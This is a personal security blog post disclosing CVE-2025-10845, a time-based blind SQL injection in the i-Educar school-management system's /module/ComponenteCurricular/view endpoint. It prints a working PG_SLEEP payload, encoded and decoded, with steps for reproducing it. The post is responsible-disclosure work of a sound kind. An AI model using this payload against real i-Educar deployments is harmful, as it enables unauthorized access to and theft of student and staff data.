Karina Gante
Posts Tags Categories
Karina Gante

Contents

CVE-2025-10845

Karina avatarKarina  included in  category CVE
    2 minutes   CC BY-NC 4.0   
How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC)

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC).

🇧🇷 Ler em Português.

While diving into the i-Educar Open-Source project, I uncovered a critical time-based blind SQL Injection vulnerability in the id parameter of the /module/ComponenteCurricular/view endpoint.
This flaw allows attackers to execute arbitrary SQL queries silently against the backend database, putting data confidentiality, integrity, and availability at risk.
After validating the issue using a payload that caused measurable delays in the server's response, I reported it responsibly, and it was officially assigned as CVE-2025-10845.

CVE-2025-10845 is a SQL Injection vulnerability in the /module/ComponenteCurricular/view endpoint of the i-Educar application.
The vulnerable parameter is id, which lacks proper input validation.
This makes it possible to inject custom SQL queries, including PG_SLEEP() functions that introduce time delays, confirming the flaw via time-based behavior.

Vulnerable Endpoint /module/ComponenteCurricular/view

Affected Parameter: id

Payload Used (Encoded)

%27%20AND%206606=(SELECT%206606%20FROM%20PG_SLEEP(5))%20AND%20%27QDaZ%27=%27QDaZ

Payload Used (Decoded)

' AND 6606=(SELECT 6606 FROM PG_SLEEP(5)) AND 'QDaZ'='QDaZ

To reproduce the vulnerability:

➤ Access the endpoint /intranet/educar_componente_curricular_lst.php and choose an id.

➤ In the vulnerable endpoint, the payload must be inserted after id number (e.g. “id=8payload”).

The server will take 5 seconds to respond, confirming that the SQL query was executed successfully.


Report

You can access the full report and see the complete step-by-step instructions. Here:

CVE-2025-10845 Report

This vulnerability can be exploited to:

  • Access sensitive data stored in the database;
  • Enumerate database schemas, tables, and columns;
  • Modify, delete, or insert arbitrary records;
  • Steal user credentials and personal information;
  • Perform a denial of service (DoS) attack by triggering long query delays;
  • In some cases, escalate to Remote Code Execution (RCE).

The flaw was ethically reported and attributed as:

References

CVE-2025-10845 on CVE.org

VulDB Entry

SQL injection attacks remain one of the most critical threats to web applications, especially when silent and time-based. This discovery demonstrates how a single unvalidated parameter can compromise the entire database behind a platform.

If you're a developer or security analyst, be aware: even small, seemingly harmless endpoints can hide dangerous flaws.

Discovered with 💜 by Karina Gante.

LinkedIn GitHub gmail Instagram

Official Member of CVE-Hunters🏹

Related Content

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC)

CVE-2025-10909

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC)

CVE-2025-10844

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC)

CVE-2025-10846

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC)

CVE-2025-10584

How I Found a Time-Based Blind SQL Injection in i-Educar (With Real Delay and PoC)

CVE-2025-10372

CC BY-NC 4.0
 SQL InjectionI-EducarCVE-2025-10845Blind SQLiCybersecurity
 | Home